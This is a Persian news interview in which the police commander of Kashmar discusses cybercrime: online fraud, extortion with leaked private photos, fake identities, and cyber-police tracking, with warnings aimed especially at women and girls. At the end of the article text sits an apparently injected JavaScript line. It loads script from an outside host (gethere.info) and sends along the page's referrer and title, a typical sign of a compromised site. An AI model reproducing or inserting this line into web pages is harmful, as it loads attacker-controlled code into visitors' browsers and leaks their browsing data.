گفتگو: محمد فیض عارفی

اشاره: فضای مجازی حالا دیگر حقیقتی است که نمی شود آن را نادیده گرفت و نمی توان به سادگی از کنار آن گذشت!

گسترش روزافزون استفاده از این فضا و حضور افراد حقیقی در این فضای مجازی، اقتضائات و شرایط خاص خود را پدید آورده است.

یکی از مسائل ایجاد شده در فضای مجازی، بروز و ظهور جرایم مختلف در این فضا می باشد. جرایمی که تا چند سال پیش وجود نداشت اما حالا با گسترش تکنولوژی و حضور گسترده افراد مختلف در فضای مجازی، شاهد بروز پدیده جدیدی به نام جرایم فضای مجازی هستیم.

به منظور آشنایی با تهدیدها، آسیب ها و جرایم شکل گرفته در این فضا و نیز جهت اطلاع با نحوه برخورد نهادهای مسئول با جرایم فضای مجازی با فرمانده نیروی انتظامی شهرستان کاشمر به گفتگو نشستیم.

آنچه در ذیل می آید ماحصل این گفتگو می باشد.

سکه دو روی فضای مجازی!

سرهنگ ابوالقاسم باقری در ابتدای این گفتگو با اشاره به شرایط و ویژگی های فضای مجازی اظهار داشت: با پیشرفت فناوری های اطلاعاتی و ارتباطی و تکنولوژی های مرتبط با آن، شاهد روبرو شدن جامعه با عصر جدیدی به نام عصر سایبر یا عصر اطلاعات و در نتیجه شکل گیری دهکده جهانی و در نوردیده شدن مرزهای فیزیکی و جغرافیایی هستیم.

وی افزود: در نتیجه به وجود آمدن این فضا، جوامع امروزی جرایم جدیدی را هم تجربه می کنند و البته در مجموع باید گفت که فضای مجازی در حقیقت سکه ای است که باید هر دو روی آن را با هم دید، رویی که ناظر بر فرصت ها و نقاط قوت آن است و روی دیگر آن که ناظر بر تهدیدها می باشد.

باقری با بیان اینکه فضای مجازی مانند هر مقوله دیگری در عالم واقع وجود دارد و لذا باید از منظر تهدید و فرصت با هم دیده شود اظهار داشت: همه فعالان عرصه فضای مجازی باید بدانند که شناخت صحیح این فضا و به تبع آن استفاده صحیح از این پدیده جدید، مستلزم شناخت و لحاظ کردن هر دو روی این سکه می باشد.

فرمانده انتظامی کاشمر ادامه داد: دستیابی آسان به آخرین اطلاعات ،جذابیت و تنوع، کاهش هزینه های اقتصادی و گسترش تعاملات و تبادل نظرها با سرعت بسیار بالا از جمله فرصت ها و نقاط قوت فضای مجازی است اما در مقابل، تهدیدات فرهنگی رسانه ای جبهه غرب علیه جامعه ما به ویژه جوانان، تضعیف اعتقادات و گسترش شبهات فکری، تزلزل در باورهای کاربران سست عقیده و کم اطلاع، گسترش فرهنگ منحط و انحرافی، اعتیاد به فضای مجازی، کلاهبرداری های اینترنتی و پیامکی، ترویج بی بند و باری، ایجاد اختلال در روابط خانوادگی، ایجاد روابط نامناسب اخلاقی، ورود بی اجازه به حریم خصوصی افراد، هویت جعلی و خروج از دنیای واقعی به سراب تخیلات از تهدیدهای این فضا می باشد.

سرهنگ باقری خاطرنشان کرد: همه باید تلاش کنیم که ضمن فرهنگسازی، بتوانیم از فرصت های فضای مجازی استفاده کنیم ولی اگر قرار باشد به صورت کورکورانه در این فضا حاضر شویم دچار یک سری مشکلات و تهدیدهایی خواهیم شد.

وی سرقت و سوء استفاده از اطلاعات شخصی، حضور ناخودآگاه در گروه ها و الگو برداری های غلط، تبلیغ ضد ارزش ها و جایگزینی آن ها به جای ارزش ها، ایجاد جنگ روانی با استفاده از شایعه پراکنی، اتلاف وقت، انرژی و سرمایه افراد حاضر در شبکه های مختلف، افزایش خطر ابتلا به افسردگی، به خطر افتادن حریم خصوصی افراد و خرید و فروش اطلاعات افراد را از جمله تهدیدهایی دانست که افراد ناآگاه در فضای مجازی را تهدید می کند.

DSC_1691

 

نظارت جدی نیروی انتظامی بر فضای مجازی

فرمانده نیروی انتظامی کاشمر در ادامه این گفتگو به موضوع برخورد با جرایم رخ داده در فضای مجازی پرداخت و تصریح کرد: در ارتباط با برخورد با جرایم فضای مجازی باید بگوییم که پلیس فتا مستقر در مرکز استان به طور مرتب فضای مجازی را رصد و کنترل می کند و تا کنون موفقیت های بسیار خوبی در برخورد با جرایم این فضا داشته است.

سرهنگ باقری افزود: پلیس فتا تا کنون در موارد متعددی توانسته است افرادی را که در فضای مجازی با انتشار عکس های خصوصی مردم اقدام به اخاذی می کردند و یا مردم را مورد کلاهبرداری های اینترنتی قرار می دادند شناسایی و مورد تعقیب قضایی قرار دهد.

وی از استقرار پلیس فتا در آینده ای نزدیک در شهرستان کاشمر خبر داد و اظهار داشت: مقرر شده است که در سال جاری در تمامی شهرهای متوسط که کاشمر هم یکی از آن ها می باشد شعبه ای از پلیس فتا ایجاد شود اما در حال حاضر هم با کمک پلیس فتای استان، اداره آگاهی شهرستان کاشمر جرایم رخ داده در فضای مجازی را زیر نظر دارد و لذا هر کدام از شهروندان که در فضای مجازی مورد کلاهبرداری قرار گرفتند و یا هر مشکل دیگری برای آن ها رخ داد و قصد پیگیری قضایی مشکل خود را داشتند می توانند به ما مراجعه کنند و ما با هماهنگی پلیس فتای استان، اطلاعات مورد نیاز را در اختیار افراد شاکی و مراجع قضایی قرار می دهیم.

باقری ادامه داد: فضای مجازی در مجموع مورد کنترل نیروی انتظامی قرار داد و رصد می شود و در حال حاضر نیز پلیس فتای استان مواردی را که در ارتباط با مسائل شهرستان کاشمر به ویژه مسائل عمومی و امنیتی آن باشد به ما اطلاع داده و ما نیز پیگیری و برخورد می کنیم به عنوان مثال در حادثه اخیری که در خلیل آباد در جریان برخورد با یک سارق رخ داد و فردی در فضای مجازی بر علیه نیروی انتظامی جوسازی کرده بود توسط پلیس فتای استان ردیابی شده و تذکرات لازم انتظامی به این فرد که در یکی دیگر از شهرستان های استان هم حضور داشت داده شد.

تمامی جرایم فضای مجازی قابل ردیابی است

وی همچنین در مورد شکایت های خصوصی از مسائل و مباحث فضای مجازی هم تصریح کرد: اگر هر کدام از شهروندان در فضای مجازی توسط افرادی مورد اهانت، تهمت، فحاشی و نسبت های ناروا قرار گرفته و با آبروی آن ها بازی شد می توانند به مراجع انتظامی و قضایی مراجعه کنند و نیروی انتظامی نیز با کمک پلیس فتا، افراد اهانت کننده را ردیابی و شناسایی کرده و مورد تعقیب قضایی قرار می دهد.

فرمانده انتظامی کاشمر همچنین نسبت به حضور افراد با هویت جعلی و با نام افراد دیگر در فضای مجازی هشدار داد و اظهار داشت: گاه مشاهده می شود که برخی افراد، نام و تصویر کاربری خود را در فضای مجازی به نام اشخاص دیگری اعلام می کنند تا بتوانند آزادانه فعالیت کنند اما این افراد باید بدانند که با این شگردها نمی توانند پلیس را فریب دهند بلکه ردیابی هویت واقعی آن ها به راحتی امکان پذیر است.

سرهنگ باقری ادامه داد: نه تنها در گروه ها بلکه حتی در گفتگوهای دو نفره ای که در فضای مجازی و شبکه های اجتماعی صورت می گیرد نیز اگر کسی مورد اهانت و یا کلاهبرداری قرار بگیرد می تواند با مراجعه به مراجع قضایی و تنظیم شکایت، حق و حقوق خود را به صورت قانونی پیگیری کند.

هشدار جدی به زنان و دختران

وی در ادامه با هشدار به زنان و دختران حاضر در فضای مجازی تصریح کرد: بانوان و به ویژه دختران جوان باید مراقب باشند که فریب شیادان و افراد کلاهبردار را نخورند چرا که تا کنون مشاهده شده است برخی افراد با سوء استفاده از احساسات و عواطف دختران جوان و با دادن اطلاعات غلط از خود و یا حتی وعده ازدواج، دختران را اغفال کرده و با آبروی آن ها بازی کرده اند.

سرهنگ باقری افزود: یکی از مواردی که توصیه اکید ما می باشد این است که خانواده  ها و به ویژه زنان و دختران به شدت مراقب تصاویر خصوصی و خانوادگی خود باشند چرا که یکی از مهمترین و گسترده ترین جرایم در فضای مجازی، سوء استفاده از تصاویر خصوصی لو رفته افراد است به گونه ای که افراد شیاد با استفاده از این تصاویر اقدام به اخاذی کرده و یا دختران جوان را مجبور به ایحاد روابط نامشروع و یا حتی فرار از خانه می کنند و این ها همه مواردی است که تا کنون مشاهده شد و متأسفانه هر جند اندک اما مواردی را هم در کاشمر مشاهده کرده ایم.

وی ادامه داد: به شدت تأکید می کنیم که افراد و به ویژه بانوان از نگهداری تصاویر خصوصی خود در گوشی های تلفن همراه، انتشار آن ها در فضای مجازی، ارسال آن ها به افراد و حتی نزدیکان و در اختیار دیگران گذاشتن گوشی خود پرهیز کنند و حتی در هنگامی که گوشی همراه آن ها نیاز به تعمیر داشت به افراد مطمئن مراجعه و حافظه گوشی را از روی آن بردارند و عکس های شخصی خود را نیز حذف کنند.

باقری همچنین نسبت به ایجاد تزلزل در روابط خانوادگی در ارتباط های ایجاد شده در فضای مجازی هم هشدار داد و گفت: متأسفانه گاه مشاهده می شود که زنان یا مردان متأهل در ارتباطاتی که در فضای مجازی به وجود می آید روابط خانوادگی و زناشویی خود را با اختلال مواجه کرده که حتی ما موردی داشته ایم که به علت همین گونه روابط نامشروع و نامناسب در فضای مجازی، منجر به طلاق زن و شوهر از یکدیگر شده است و لذا این ها همه مواردی است که در صورت عدم دقت می تواند فضای حقیقی و زندگی واقعی مردم را تحت تأثیر سوء خود قرار دهد.

فرمانده انتظامی کاشمر در پایان تصریح کرد: در مجموع باید بگوییم که برای نیروی انتظامی و سایر نهادهای قضایی، در بحث برخورد با تخلفات و پیگیری آن ها، فضای مجازی با فضای حقیقی تفاوتی ندارد و ما با هر گونه جرم و تخلف در فضای مجازی نیز به شدت برخورد کرده و در صورت شکایت خصوصی هم به طور کامل پیگیری قانونی لازم را انجام می دهیم.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

 • پرینت از این پست پرینت از این پست
 • برچسب ها:

  به اشتراک بگذارید :

  مطالب مشابه

  شما هم می توانید دیدگاه خود را ثبت کنید

  - کامل کردن گزینه های ستاره دار (*) الزامی است
  - آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد